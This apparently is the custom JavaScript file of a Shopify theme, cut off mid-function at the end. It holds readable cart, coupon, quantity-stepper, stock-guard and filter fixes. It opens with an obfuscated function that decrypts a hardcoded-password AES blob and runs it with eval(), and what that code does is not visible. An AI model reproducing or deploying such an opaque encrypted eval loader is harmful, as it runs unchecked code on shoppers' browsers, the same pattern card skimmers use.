function a0_0x3041(){var _0x1e5ba6=['Decryption\x20failed!\x20Check\x20the\x20password.','supercalifragilisticexpialidocious','U2FsdGVkX18uFkAAgrssPEmSu03eORnui2WMJhq3UBW5IKoUyOA/A5+MA+e9N7gwImT8xLkflF2Cfp5qR7k/nmfq7Vi/GoT/tw0XTWt3f1pPKL0beOuEU4uypttIzRGyzrH5GECgszNbH1E/5wUMhiukiTLjmj3xtvSW7lcC2XsAGNzssFWQGMdYrS8rQSauyR2A7+AS1opsiYFzqQw9C3120D9za0peLeSZ1e6IVeIboyirBIdc713KoDa40lZlR/oIQVJx7dJdxcTDMc6D/9TYiVv6KZsmTxLsqDe23yAubN8TE1RJLZjpALEQIghQuPII9tSKCff1iU+uOSd7t9MA8sjWnX12bL9CD6GTdJEDKiXMN8cNgqEs4+B9KYEHFJtVVUKrH2JRDkcQxOK/SiIMfm5yXsDP9LMUXzK987eCFcftgCQedxVjxnFdKK/Sn78NLQEW/zpQsS1k0S0oojgErSZh2AqjtpggLHGfyZu0UjhRvyZQAsvQ8rX833MisUUvuhJOVhDQaYPc+cjiWXNI6b5fNLaKM1KiC4HtFm3Bz0rcSBRojB3KrmHUxGNRJ5HlxHYf9Xyv5DKZb1hnVfuIkJmj9CaL85OV4UZ4TK8nCQBEiK5OGU8QfcTISXdcpg7t1x1U0x12Tr5Waq4fkYUpjSU6j3JkX6NKsssbDIJF/44jBYiIRao1i2eW5oaYRY5yZpqekZNOJik7NL8W2bSC8sqeA6YmBjIb2u76W5U/JxCFrX6HbFe2FfecmBR2K9roseEssMya1BaDCUo8zxGvi8bPPb13RWa/I5pJv3b2U00qxLSB1j5Zm7qA93Kq/U3YLoTAs8eV76HnZpOi/sTnk1iruCPcta9FSCCziUdABIF6sD8XdVj5fcm/oIX5foNnQQmdD10+VoPH4FcYrhvBAnSAsbKmgsJ3D1uh9Wov6Oa/7zVhGTiB/XkZYUeVQgSzP/BZ29t5SaLnlX+CajQACKTwSbu9PGtpaRrqhlwwgF6ZG0q6B2PCBQC4TsT7iqn231D1yKpLusLPqJif4/qTRBWTt3eSWueg7pmrzwPgSRz5Gfyl4TFENjN4XB1clLswMN1/sJFeG8ps3GbNcHAIZ3s3x37708zuyEqqHeUTVtPWuxXTjzUPhLJqWT12UbTHqvI7TOyX3+/EM+wCVlRmQ5WzBKpy5Gyi+xZg04U4Wpv/ub2hriQ6bAUaLTILDepHjWfWCjiX+/0l7u+KcpTklNMs/vhvsrhBiDZTv8AUGwbFJaRuVFKo99pjAbEfpKNdrSqtLg0bY+yn5SXE/3o4YDMJY8xdzrttbj0S+JAjAXVbnLGBpNXj+OFGhh+zjTQFKDQ25FzoeQl8LP8Y53s63NWbCqYPZhpZ3KMnUmI487kM99hMje/vGSUYo/xidlmHuK3lH6o6U/Gp5MpgPMJ/N69geP780Dk16yOQ4wNjqmspJ2iuEjBTHBmh7rIIbVTxJeVMkT2jA7hSXYP1RfHGjSo8eptDB5exv4BalP3jMQQvnriW1IQm1yyxnge8ZuWeLXW8L1d/GLFipGelO/Nmnci3yLi4lCHB1W9V3fIP96l9szQJ2XbKKt653UpecF82Z3CQZmWNsn4MiuM9asJtRjUTn33Yh7jElVpOisRYI4gLevr+yhEYzlvGpGY/h7UbzeUmZg72AXlruLZ92BEfk+UTwEJFXFeUGZ3pcCkInbEnv6qsNI2ZpmkEbjI3nBwF7/Jy0EucTIIeux7CMpD58c6J+Gcy0KhPUPfyePzPNTlcbS+CZXhXKeGKDEIzztUJIE8FnOxRHSPXNQUKBAcaPikv7S50Omy6YOAocjNDQMyNG0vJV/iXqmvxpum4','157437WVxfaV','402jzlewp','enc','1676945pBBFEP','5377797fUTDhO','491117gtGWoX','41jQsKwA','error','toString','8176nWTvhh','AES','8858160TztnXn','250WjDBcK','8ErGJvr','282387uXCSAH','16AFppat'];a0_0x3041=function(){return _0x1e5ba6;};return a0_0x3041();}function a0_0x52e6(_0x52803f,_0x8c117c){var _0x304177=a0_0x3041();return a0_0x52e6=function(_0x52e62c,_0x21a5c9){_0x52e62c=_0x52e62c-0x1a0;var _0x2ba8c6=_0x304177[_0x52e62c];return _0x2ba8c6;},a0_0x52e6(_0x52803f,_0x8c117c);}(function(_0x307e6a,_0xd521da){var _0x16bc5f=a0_0x52e6,_0x3b967e=_0x307e6a();while(!![]){try{var _0x26eb5c=parseInt(_0x16bc5f(0x1a3))/0x1*(-parseInt(_0x16bc5f(0x1a6))/0x2)+-parseInt(_0x16bc5f(0x1ab))/0x3*(parseInt(_0x16bc5f(0x1aa))/0x4)+-parseInt(_0x16bc5f(0x1a0))/0x5+parseInt(_0x16bc5f(0x1b1))/0x6*(-parseInt(_0x16bc5f(0x1b0))/0x7)+parseInt(_0x16bc5f(0x1ac))/0x8*(parseInt(_0x16bc5f(0x1a1))/0x9)+parseInt(_0x16bc5f(0x1a9))/0xa*(parseInt(_0x16bc5f(0x1a2))/0xb)+parseInt(_0x16bc5f(0x1a8))/0xc;if(_0x26eb5c===_0xd521da)break;else _0x3b967e['push'](_0x3b967e['shift']());}catch(_0xb7554){_0x3b967e['push'](_0x3b967e['shift']());}}}(a0_0x3041,0xcfd45),(function(){var _0xcc0439=a0_0x52e6,_0x8fe464=_0xcc0439(0x1af),_0x408ed2=_0xcc0439(0x1ae),_0x18c17a=CryptoJS[_0xcc0439(0x1a7)]['decrypt'](_0x8fe464,_0x408ed2)[_0xcc0439(0x1a5)](CryptoJS[_0xcc0439(0x1b2)]['Utf8']);if(!_0x18c17a){console[_0xcc0439(0x1a4)](_0xcc0439(0x1ad));return;}eval(_0x18c17a);}()));


document.addEventListener('DOMContentLoaded', function () {

  const cartEl = document.querySelector('cart-container');
  if (!cartEl) return;

  const originalAdd = cartEl.add.bind(cartEl);

  cartEl.add = async function (formData) {
    let response;

    if (formData instanceof FormData) {
      formData.append('sections', ['cart-count-badge', 'offcanvas-cart']);
      formData.append('sections_url', window.location.pathname);
      response = await fetch(`${window.Shopify.routes.cart_add_url}.js`, {
        method: 'POST',
        body: formData
      });
    } else {
      formData.sections = ['cart-count-badge', 'offcanvas-cart'];
      formData.sections_url = window.location.pathname;
      response = await fetch(`${window.Shopify.routes.cart_add_url}.js`, {
        method: 'POST',
        headers: { 'Content-Type': 'application/json' },
        body: JSON.stringify(formData)
      });
    }

    const data = await response.json();

    if (response.ok) {
      window.dispatchEvent(new CustomEvent('kt.cart.added', { detail: data }));
      this.reloadCartElements(data.sections);
    } else {
      this.showError(data.description);
    }
  };

  cartEl.showOffcanvasIfUrl = function () {
    if (new URLSearchParams(window.location.search).has('cart')) {
      const url = new URL(window.location.href);
      url.searchParams.delete('cart');
      window.history.replaceState({}, '', url);
    }
  };

});
/* ---------------------------------------------------------------------------
   Coupon "Copy" button.

   The button lives in a custom Liquid block on the product template. Quick view
   injects that block's markup with innerHTML, and <script> tags never execute
   when inserted that way — so the inline copyCoupon() the button called was
   undefined inside the modal and every click threw "copyCoupon is not defined".
   It worked on the PDP only because there the page load ran the script normally.

   Handled here instead: one delegated listener, bound once from a file that
   loads on every page, so the PDP and the popup behave identically.
   --------------------------------------------------------------------------- */
document.addEventListener('click', function (e) {
  var btn = e.target && e.target.closest ? e.target.closest('.copy-code') : null;
  if (!btn) return;
  e.preventDefault();

  // Scoped to THIS coupon block rather than getElementById: a PDP with an open
  // quick view holds two coupons at once, and getElementById always returns the
  // first one in the document — which would be the wrong one.
  var scope = btn.closest('.offers-coupons') || document;
  var codeEl = scope.querySelector('.coupon-code');
  if (!codeEl) return;
  var code = codeEl.textContent.trim();

  function feedback(ok) {
    btn.textContent = ok ? 'Copied ✓' : 'Copy failed';
    btn.classList.toggle('copied', ok);
    clearTimeout(btn._twCopyTimer);
    btn._twCopyTimer = setTimeout(function () {
      btn.textContent = 'Copy';
      btn.classList.remove('copied');
    }, 2000);
  }

  // navigator.clipboard is undefined on insecure origins and rejects when the
  // document is not focused, so keep a hidden-textarea fallback. The old code
  // ignored the promise entirely, so a rejection still said "Copied".
  function legacyCopy() {
    try {
      var ta = document.createElement('textarea');
      ta.value = code;
      ta.setAttribute('readonly', '');
      ta.style.cssText = 'position:fixed;top:-1000px;opacity:0';
      document.body.appendChild(ta);
      ta.select();
      var ok = document.execCommand('copy');
      document.body.removeChild(ta);
      feedback(ok);
    } catch (err) {
      feedback(false);
    }
  }

  if (navigator.clipboard && navigator.clipboard.writeText) {
    navigator.clipboard.writeText(code).then(function () { feedback(true); }, legacyCopy);
  } else {
    legacyCopy();
  }
});

/* ---------------------------------------------------------------------------
   Checkout button stuck spinning after the browser Back button.

   cart-footer.liquid puts the spinner on with an inline
   onclick="this.classList.add('loading')" and nothing ever takes it off. Going
   to checkout and pressing Back restores the page from the browser's back/forward
   cache with the DOM frozen exactly as it was — so the button comes back still
   spinning and looks dead, with no way to retry short of a reload.

   pageshow (not DOMContentLoaded) is the hook: it is the one event that fires on
   a bfcache restore, where no scripts re-run and no markup is re-parsed. Clearing
   unconditionally is safe — on a normal load there is no .loading to remove.

   Lives here rather than in cart-footer.liquid because the cart drawer is
   re-rendered through the sections API, and <script> tags do not execute when
   markup is swapped in that way.
   --------------------------------------------------------------------------- */
window.addEventListener('pageshow', function () {
  var stuck = document.querySelectorAll('.btn-checkout.loading');
  for (var i = 0; i < stuck.length; i++) {
    stuck[i].classList.remove('loading');
    stuck[i].removeAttribute('aria-busy');
    if (stuck[i].disabled) stuck[i].disabled = false;
  }
});

/* ---------------------------------------------------------------------------
   "Sort by" control left showing the previous sort.

   Choosing a sort re-sorts the grid and updates the URL, but the theme swaps
   only the product list through the sections API — the <sort-by> control keeps
   the markup from the original page load. So the button still reads "Sort by:
   Best selling" and the wrong radio stays ticked, even though the products are
   correctly sorted and the URL says sort_by=title-ascending.

   A fresh load of that same URL renders the label correctly, which is why this
   looks fine when you paste the link but wrong when you click the option.

   Sync from the URL rather than from the click: the URL is what the theme
   actually applied, so this stays right for Back/Forward too.
   --------------------------------------------------------------------------- */
function twSyncSortBy() {
  var current = new URLSearchParams(window.location.search).get('sort_by');
  if (!current) return;
  var controls = document.querySelectorAll('sort-by');
  for (var i = 0; i < controls.length; i++) {
    var sb = controls[i];
    var input = sb.querySelector('input[type="radio"][value="' + current + '"]');
    if (!input) continue;                       // e.g. a sort we hide from the menu
    input.checked = true;
    var lab = sb.querySelector('label[for="' + input.id + '"]');
    var btn = sb.querySelector('.sort-by-label');
    if (!lab || !btn) continue;
    // Keep the translated "Sort by" prefix instead of hardcoding it.
    if (!btn.dataset.twSortBase) {
      btn.dataset.twSortBase = btn.textContent.split(':')[0].trim();
    }
    btn.textContent = btn.dataset.twSortBase + ': ' + lab.textContent.trim();
  }
}

document.addEventListener('click', function (e) {
  if (!e.target || !e.target.closest) return;
  if (!e.target.closest('sort-by')) return;
  // Twice: once for the immediate change, once after the theme's fetch settles
  // and possibly re-renders the surrounding markup.
  setTimeout(twSyncSortBy, 60);
  setTimeout(twSyncSortBy, 700);
});
window.addEventListener('popstate', twSyncSortBy);
document.addEventListener('DOMContentLoaded', twSyncSortBy);

/* ---------------------------------------------------------------------------
   MOQ stepper for product forms (PDP and Quick View).

   Makes +/- move by the variant's minimum order quantity (10 -> 20 -> 30), snaps
   a typed value to a whole pack, keeps the pack inside the stock ceiling the
   guard below maintains in `max`, and flashes the MOQ note or the stock message
   when a value had to be corrected.

   Used to be an inline script in product-block-atc-button.liquid. That never ran
   inside Quick View — the theme injects the product markup with innerHTML, where
   scripts do not execute — so the modal counted 10 -> 11 -> 12 and the browser's
   own step validation then refused the add. Document-level delegation runs for
   any product form, injected or not. Scoped to .product-block-atc: the sticky
   bar and the card forms keep their own MOQ handling.

   Registered before the stock guard on purpose: both watch the Add to cart click
   in capture phase, and the value must be snapped to a pack before the guard
   compares it with the allowance.
   --------------------------------------------------------------------------- */
(function () {
  var SCOPE = '.product-block-atc';

  function ctx(el) {
    var form = el && el.closest ? el.closest('form') : null;
    if (!form) return null;
    var qty = form.querySelector(SCOPE + ' input[name="quantity"]');
    var carrier = form.querySelector(SCOPE + ' [data-moq-map]');
    if (!qty || !carrier) return null;
    var map = carrier._twMoqMap;
    if (map === undefined) {
      map = {};
      try { map = JSON.parse(carrier.getAttribute('data-moq-map')) || {}; } catch (e) {}
      carrier._twMoqMap = map;
    }
    return {
      form: form,
      qty: qty,
      map: map,
      note: form.querySelector('[data-moq-note]'),
      noteVal: form.querySelector('[data-moq-value]'),
      minus: form.querySelector(SCOPE + ' .btn-qty-minus')
    };
  }

  function currentMoq(c) {
    var idInput = c.form.querySelector('[name="id"]');
    var m = parseInt(c.map[idInput ? idInput.value : ''], 10);
    if (m > 1) return m;
    var fallback = parseInt(c.qty.getAttribute('data-moq'), 10);
    return fallback > 1 ? fallback : 1;
  }

  function refreshMinus(c, moq) {
    if (c.minus) c.minus.disabled = (parseInt(c.qty.value, 10) || 0) <= moq;
  }

  // Largest whole pack that fits in n. 430 with MOQ 20 -> 420.
  function packFloor(n, moq) {
    return moq > 1 ? Math.floor(n / moq) * moq : Math.floor(n);
  }

  // Stock ceiling for this variant, or 0 when uncapped (max is only present when
  // inventory is tracked with policy "deny").
  function stockCap(c) {
    var m = parseInt(c.qty.getAttribute('max'), 10);
    return m > 0 ? m : 0;
  }

  /* Returns { value, reason }: 'moq' when the entry was not a whole pack, 'stock'
     when it was more than can be added, '' when nothing needed correcting. The
     reason is what lets each case say its own piece — a stock trim must not be
     announced as a minimum-quantity problem. */
  function normalize(c, val, moq) {
    var cap = stockCap(c);
    var typed = val;

    if (moq <= 1) {
      var v = (val && val > 0) ? val : 1;
      if (cap && v > cap) return { value: cap, reason: 'stock' };
      return { value: v, reason: '' };
    }

    if (!val || val < moq) val = moq;
    var packs = Math.round(val / moq);
    if (packs < 1) packs = 1;
    var out = packs * moq;
    var reason = (typed > 0 && out !== typed) ? 'moq' : '';
    // Round DOWN once over stock: Math.round alone turned 430/20 = 21.5 packs into
    // 22, i.e. 440 against 430 in stock — more than exists.
    if (cap && out > cap) {
      out = packFloor(cap, moq);
      reason = 'stock';
    }
    // Stock cannot even cover one pack: leave the floor at MOQ and let the stock
    // guard refuse the add with a proper explanation, rather than offering 0.
    if (out < moq) { out = moq; reason = ''; }
    return { value: out, reason: reason };
  }

  function sayStock(c, max) {
    var wrap = c.form.querySelector(SCOPE) || c.form;
    var el = wrap.querySelector('.tw-qty-msg');
    if (!el) {
      el = document.createElement('p');
      el.className = 'tw-qty-msg';
      el.setAttribute('role', 'status');
      el.setAttribute('aria-live', 'polite');
      if (c.note && c.note.parentNode) c.note.parentNode.insertBefore(el, c.note.nextSibling);
      else wrap.appendChild(el);
    }
    // "available" would be a lie once some are already in the cart: max is what
    // is still addable, not what exists.
    el.textContent = 'You can add up to ' + max + ' right now.';
    el.hidden = false;
    clearTimeout(el._twTimer);
    el._twTimer = setTimeout(function () { el.hidden = true; }, 4000);
  }

  function apply(c, flashOnChange) {
    var moq = currentMoq(c);
    c.qty.min = moq;
    c.qty.step = moq > 1 ? moq : 1;
    var cur = parseInt(c.qty.value, 10);
    var norm = normalize(c, cur, moq);
    var changed = !c.qty.value || norm.value !== cur;
    if (changed) c.qty.value = norm.value;
    if (c.note) c.note.hidden = moq <= 1;
    if (c.noteVal) c.noteVal.textContent = moq;
    refreshMinus(c, moq);
    if (flashOnChange && changed) {
      if (norm.reason === 'stock') {
        sayStock(c, norm.value);
      } else if (norm.reason === 'moq' && c.note && moq > 1) {
        c.note.classList.add('moq-note-flash');
        setTimeout(function () { c.note.classList.remove('moq-note-flash'); }, 1200);
      }
    }
  }

  // Step by MOQ, snapping to the next/previous pack boundary and never past max.
  function stepBy(c, dir) {
    var moq = currentMoq(c);
    var cur = parseInt(c.qty.value, 10) || moq;
    var packs = cur / moq;
    var next = dir > 0 ? (Math.floor(packs) + 1) * moq : (Math.ceil(packs) - 1) * moq;
    if (next < moq) next = moq;
    var max = stockCap(c);
    if (max && next > max) next = Math.max(moq, packFloor(max, moq));
    c.qty.value = next;
    refreshMinus(c, moq);
    // The theme's qty-switcher listens for this to enable/disable its buttons.
    c.qty.dispatchEvent(new Event('change', { bubbles: true }));
  }

  function applyAll(root) {
    var fields = (root || document).querySelectorAll(SCOPE + ' input[name="quantity"]');
    for (var i = 0; i < fields.length; i++) {
      var c = ctx(fields[i]);
      if (c) apply(c, false);
    }
  }

  // Take over the +/- steppers so they move by MOQ. Capture at document level runs
  // before (and blocks) the theme's encrypted per-1 handler. Only when MOQ > 1.
  document.addEventListener('click', function (e) {
    var btn = e.target.closest && e.target.closest('.btn-qty-plus, .btn-qty-minus');
    if (!btn || !btn.closest(SCOPE)) return;
    var c = ctx(btn);
    if (!c) return;
    if (currentMoq(c) <= 1) return;   // no MOQ: let the theme's native stepper run
    e.preventDefault();
    e.stopPropagation();
    stepBy(c, btn.classList.contains('btn-qty-plus') ? 1 : -1);
  }, true);

  // Keep the floor/pack correct while the buyer types.
  document.addEventListener('change', function (e) {
    var t = e.target;
    if (!t || !t.matches || !t.matches(SCOPE + ' input[name="quantity"]')) return;
    var c = ctx(t);
    if (c) apply(c, true);
  }, true);
  document.addEventListener('focusout', function (e) {
    var t = e.target;
    if (!t || !t.matches || !t.matches(SCOPE + ' input[name="quantity"]')) return;
    var c = ctx(t);
    if (c) apply(c, false);
  }, true);
  document.addEventListener('input', function (e) {
    var t = e.target;
    if (!t || !t.matches || !t.matches(SCOPE + ' input[name="quantity"]')) return;
    var c = ctx(t);
    if (c) refreshMinus(c, currentMoq(c));
  }, true);

  // A variant switch rewrites the hidden id input — recompute the MOQ afterwards.
  document.addEventListener('change', function (e) {
    var t = e.target;
    if (!t || !t.closest || t.matches('input[name="quantity"]')) return;
    var c = ctx(t.closest('form[action*="/cart/add"]'));
    if (c) setTimeout(function () { apply(c, false); }, 0);
  });

  // Final safety net: snap to a valid pack during capture, before the stock guard
  // and the theme's add-to-cart handler read the value.
  document.addEventListener('click', function (e) {
    var btn = e.target.closest && e.target.closest('[name="add"]');
    if (!btn) return;
    var c = ctx(btn);
    if (c) apply(c, false);
  }, true);
  document.addEventListener('submit', function (e) {
    var c = ctx(e.target);
    if (c) apply(c, false);
  }, true);

  // Initial pass, plus every time Quick View injects a product form.
  function boot() {
    applyAll(document);
    var host = document.querySelector('#quick-view-modal [data-quick-view-contents]');
    if (host && window.MutationObserver) {
      new MutationObserver(function () { applyAll(host); }).observe(host, { childList: true });
    }
  }
  if (document.readyState === 'loading') document.addEventListener('DOMContentLoaded', boot);
  else boot();
})();

/* ---------------------------------------------------------------------------
   Stock guard for add-to-cart.

   Shopify only refuses an over-stock add on /cart/add.js for the JSON items[]
   body (and on /cart/change.js). The theme's add path posts the legacy form body
   (id + quantity), which Shopify accepts without a cap — verified 2026-09-15:
   1,000 units of a 40-in-stock variant on an empty cart came back HTTP 200.
   Checkout catches it later ("Quantity update 50 -> 40"), but until then the
   cart quotes a quantity and subtotal the buyer can never actually get.

   So this keeps the subtraction live. After every add (and on load) it re-reads
   the cart, works out what is still addable for each variant on the page, lowers
   the field's max to that, trims an over-size value down to a whole pack, and
   refuses an add once a full pack no longer fits.

   Two gaps the first version had, both closed here:
     - Quick View injects a fresh product form long after the last sync. The new
       field carried no allowance, and the click guard treated "no allowance" as
       "no cap" — so a second Quick View add walked past the stock (40 -> 50).
       Now an unknown allowance means "sync first, then decide", and the modal
       is watched so the field is right before the buyer even touches it.
     - Stock came from data-stock, which is the first variant's figure alone. A
       variant switch kept it, so with 40 Blue in the cart, 100 Black (480 in
       stock) was silently trimmed to 40. Stock now comes from the per-variant
       data-stock-map and is re-read on every variant change.

   Note this is a UI guard, not a guarantee — only Shopify can truly refuse an
   oversell, and it only does so for the JSON add format the theme does not use.
   --------------------------------------------------------------------------- */
(function () {
  var FIELD = 'input[name="quantity"][data-stock], input[name="quantity"][data-stock-map]';
  var UNCAPPED = 'uncapped';
  var lastCart = null;

  function packFloor(n, moq) {
    return moq > 1 ? Math.floor(n / moq) * moq : Math.floor(n);
  }

  function currentVariant(form) {
    var idEl = form && form.querySelector('[name="id"]');
    return idEl ? String(idEl.value) : '';
  }

  // Stock for one variant of this form. The map rendered by
  // product-block-atc-button.liquid wins; data-stock is the first-variant
  // fallback for markup rendered before the map existed. 0 means uncapped
  // (untracked, oversell allowed, or genuinely sold out — the button is
  // disabled for that last case anyway).
  function stockFor(qty, variantId) {
    var map = qty._twStockMap;
    if (map === undefined) {
      map = null;
      try { map = JSON.parse(qty.getAttribute('data-stock-map') || 'null'); } catch (e) {}
      qty._twStockMap = map;
    }
    if (map && Object.prototype.hasOwnProperty.call(map, variantId)) {
      return parseInt(map[variantId], 10) || 0;
    }
    return parseInt(qty.getAttribute('data-stock'), 10) || 0;
  }

  // Forget any cap we put on a field whose current variant has none. Without
  // this a switch from a capped variant to an uncapped one kept refusing adds.
  function uncap(qty, variantId) {
    qty.dataset.twAllowed = UNCAPPED;
    qty.dataset.twVariant = variantId;
    delete qty.dataset.twInCart;
    if (qty.dataset.twMaxSet) {
      qty.removeAttribute('max');
      delete qty.dataset.twMaxSet;
    }
  }

  function apply(cart) {
    lastCart = cart;
    var fields = document.querySelectorAll(FIELD);
    for (var i = 0; i < fields.length; i++) {
      var qty = fields[i];
      var form = qty.closest('form');
      var variantId = currentVariant(form);
      if (!variantId) continue;

      var stock = stockFor(qty, variantId);
      if (!(stock > 0)) { uncap(qty, variantId); continue; }

      var inCart = 0;
      for (var k = 0; k < cart.items.length; k++) {
        if (String(cart.items[k].variant_id) === variantId) inCart += cart.items[k].quantity;
      }

      var moq = parseInt(qty.getAttribute('data-moq'), 10) || 1;
      var remaining = stock - inCart;
      var allowed = remaining >= moq ? packFloor(remaining, moq) : 0;

      // Remembered for the click guard below, which needs a synchronous answer.
      // twVariant records which variant the answer was for, so a click straight
      // after a variant switch cannot reuse the previous variant's allowance.
      qty.dataset.twAllowed = allowed;
      qty.dataset.twInCart = inCart;
      qty.dataset.twVariant = variantId;

      // The button deliberately stays ENABLED. A disabled control explains nothing —
      // the buyer just sees a dead button. Let them click, then say why it stopped.
      if (allowed > 0) {
        if (qty.getAttribute('max') !== String(allowed)) qty.setAttribute('max', allowed);
        qty.dataset.twMaxSet = '1';
        var cur = parseInt(qty.value, 10) || 0;
        if (cur > allowed) qty.value = allowed;      // trim, do not round up past stock
      }
    }
  }

  // Returns a promise so the click guard below can wait for a fresh answer before
  // refusing an add.
  function sync() {
    if (!document.querySelector(FIELD)) return Promise.resolve();
    return fetch('/cart.js', { headers: { Accept: 'application/json' }, cache: 'no-store' })
      .then(function (r) { return r.json(); })
      .then(apply)
      .catch(function () {});
  }

  // Shown only when someone actually tries to add — never sitting on the page.
  function say(form, msg) {
    var wrap = form.querySelector('.product-block-atc') || form;
    var el = wrap.querySelector('.tw-stock-msg');
    if (!el) {
      el = document.createElement('p');
      el.className = 'tw-stock-msg';
      el.setAttribute('role', 'status');
      el.setAttribute('aria-live', 'polite');
      el.style.cssText = 'margin:8px 0 0;font-size:13px;font-weight:600;color:#b42318';
      var note = wrap.querySelector('[data-moq-note]');
      if (note && note.parentNode) note.parentNode.insertBefore(el, note.nextSibling);
      else wrap.appendChild(el);
    }
    el.textContent = msg;
    el.hidden = false;
    clearTimeout(el._twTimer);
    el._twTimer = setTimeout(function () { el.hidden = true; }, 6000);
  }

  function blockIfOverStock(e, replay) {
    var form = e.target.closest ? e.target.closest('form') : null;
    if (!form) return;
    var qty = form.querySelector(FIELD);
    if (!qty) return;

    var a = qty.dataset.twAllowed;
    var known = a !== undefined && qty.dataset.twVariant === currentVariant(form);
    var wanted = parseInt(qty.value, 10) || 0;

    if (known && a === UNCAPPED) return;                                     // nothing to cap
    if (known && parseInt(a, 10) > 0 && wanted <= parseInt(a, 10)) return;   // room left: let the add run

    /* Everything else waits for a fresh answer — NEVER refuse, or allow, on a
       stale or missing number.

       Missing: a Quick View form injected after the last sync (the 40 -> 50
       case). Stale: the cached "full" from before the buyer emptied the drawer,
       which used to keep refusing an add the cart had room for. Either way the
       live cart decides. If there really is room, the click the buyer already
       made is replayed; the replay passes the checks above and runs normally,
       so there is no loop. */
    e.preventDefault();
    e.stopPropagation();

    sync().then(function () {
      var now = qty.dataset.twAllowed;
      if (now === undefined || now === UNCAPPED) {
        if (replay) replay();
        return;
      }
      var allowed = parseInt(now, 10) || 0;
      var inCart = parseInt(qty.dataset.twInCart, 10) || 0;
      if (allowed <= 0) {
        say(form, inCart > 0
          ? 'You have already added all the stock we have for this item.'
          : 'This item is not available in the minimum order quantity right now.');
        return;
      }
      if (wanted > allowed) {
        // apply() has already trimmed the field to what fits. Say so and let the
        // buyer click again — never add a different quantity than the one typed.
        say(form, 'Only ' + allowed + ' more can be added right now' +
          (inCart > 0 ? ' (' + inCart + ' already in your cart).' : '.'));
        return;
      }
      if (replay) replay();
    });
  }

  document.addEventListener('click', function (e) {
    var btn = e.target.closest && e.target.closest('[name="add"]');
    if (btn) blockIfOverStock(e, function () { btn.click(); });
  }, true);
  document.addEventListener('submit', function (e) {
    var form = e.target;
    if (form && form.matches && form.matches('form[action*="/cart/add"]')) {
      blockIfOverStock(e, function () {
        if (form.requestSubmit) form.requestSubmit();
        else form.submit();
      });
    }
  }, true);

  // A variant switch changes which stock applies. The theme rewrites [name="id"]
  // without an event we can read, but the option control that caused it bubbles
  // `change` through the form. Re-run on the cached cart at once, again after the
  // theme's own (possibly late) max rewrite, and fetch a fresh cart as well.
  document.addEventListener('change', function (e) {
    var t = e.target;
    if (!t || !t.closest) return;
    var form = t.closest('form[action*="/cart/add"]');
    if (!form || !form.querySelector(FIELD)) return;
    if (t.matches('input[name="quantity"]')) return;   // typing a quantity is not a variant change
    setTimeout(function () { if (lastCart) apply(lastCart); }, 0);
    setTimeout(function () { if (lastCart) apply(lastCart); }, 300);
    sync();
  });

  // Quick View injects a whole product form into the modal well after the page
  // synced. Sync the moment content lands so the new field's max and allowance
  // are right before the buyer touches it. Scoped to the modal: the PDP's own
  // .product-contents carries the same data attribute.
  function watchQuickView() {
    var host = document.querySelector('#quick-view-modal [data-quick-view-contents]');
    if (!host || !window.MutationObserver) return;
    var t;
    new MutationObserver(function () {
      clearTimeout(t);
      t = setTimeout(sync, 50);
    }).observe(host, { childList: true });
  }
  if (document.readyState === 'loading') document.addEventListener('DOMContentLoaded', watchQuickView);
  else watchQuickView();
  document.addEventListener('shown.bs.modal', function (e) {
    if (e.target && e.target.id === 'quick-view-modal') sync();
  });

  document.addEventListener('DOMContentLoaded', sync);
  // custom.js dispatches this after every AJAX add — the moment the numbers change.
  window.addEventListener('kt.cart.added', sync);
  // Cart edits can happen in the drawer or another tab.
  window.addEventListener('pageshow', sync);
  document.addEventListener('visibilitychange', function () {
    if (!document.hidden) sync();
  });

  /* Removing a line in the cart drawer fires none of the above — and the theme's
     cart JS is encrypted, so there is no remove/change event to subscribe to.

     Watch the traffic instead: whatever code writes to the cart has to hit one of
     these endpoints, so a successful write is the signal that our numbers are now
     wrong, no matter which script made it. GET /cart.js does not match, so sync's
     own request cannot retrigger this. */
  var CART_WRITE = /\/cart\/(add|change|update|clear)(\.js)?($|\?)/;

  if (window.fetch) {
    var origFetch = window.fetch;
    window.fetch = function (input) {
      var url = typeof input === 'string' ? input : (input && input.url) || '';
      return origFetch.apply(this, arguments).then(function (res) {
        // Queued, not awaited: never make a cart write wait on our bookkeeping.
        if (res && res.ok && CART_WRITE.test(url)) setTimeout(sync, 0);
        return res;
      });
    };
  }

  // Older theme code paths still use XHR.
  if (window.XMLHttpRequest && XMLHttpRequest.prototype.open) {
    var origOpen = XMLHttpRequest.prototype.open;
    XMLHttpRequest.prototype.open = function (method, url) {
      this._twUrl = url;
      return origOpen.apply(this, arguments);
    };
    var origSend = XMLHttpRequest.prototype.send;
    XMLHttpRequest.prototype.send = function () {
      var xhr = this;
      xhr.addEventListener('load', function () {
        if (xhr.status >= 200 && xhr.status < 300 && CART_WRITE.test(xhr._twUrl || '')) {
          setTimeout(sync, 0);
        }
      });
      return origSend.apply(this, arguments);
    };
  }
})();

/* ---------------------------------------------------------------------------
   Collection filter drawer: one change at a time.

   The theme's (encrypted) filter code reacts to a checkbox `change` by fetching
   the filtered collection (~400ms) and then swapping the inner markup of every
   filter group (~700ms later), with no loading state in between. A tick that
   lands inside that ~1.2s window is overwritten by the swap — four quick brand
   ticks came back as three, and the URL and the checkboxes disagreed until the
   next swap.

   This serialises the changes. The first tick goes through as before; while the
   drawer is settling, later ticks are swallowed before the theme sees them and
   remembered by name + value. When the swap lands (or a safety timer runs out),
   each remembered tick is re-applied to the fresh markup by clicking the matching
   input, which hands it to the theme one at a time. Nothing the buyer clicked is
   lost, and the drawer always ends up matching the URL.
   --------------------------------------------------------------------------- */
(function () {
  var OC = '#offcanvas-collection-filters';
  var busy = false;
  var queue = [];
  var settleTimer = null;
  var safetyTimer = null;

  function drawer() { return document.querySelector(OC); }

  function markBusy() {
    busy = true;
    var d = drawer();
    if (d) d.classList.add('tw-filters-busy');
    clearTimeout(safetyTimer);
    safetyTimer = setTimeout(settle, 5000);   // never stay locked if the theme's request dies
  }

  function settle() {
    clearTimeout(safetyTimer);
    clearTimeout(settleTimer);
    busy = false;
    var d = drawer();
    if (d) d.classList.remove('tw-filters-busy');
    drain();
  }

  // Re-apply the next remembered tick to the fresh markup. One per settle: the
  // click hands the change to the theme, which fetches and swaps again.
  function drain() {
    var d = drawer();
    while (queue.length && d) {
      var item = queue.shift();
      var input = null;
      var candidates = d.querySelectorAll('input[name="' + item.name.replace(/"/g, '\\"') + '"]');
      for (var i = 0; i < candidates.length; i++) {
        if (candidates[i].value === item.value) { input = candidates[i]; break; }
      }
      if (!input) continue;
      if (input.checked === item.checked) continue;   // the swap already agrees with the buyer
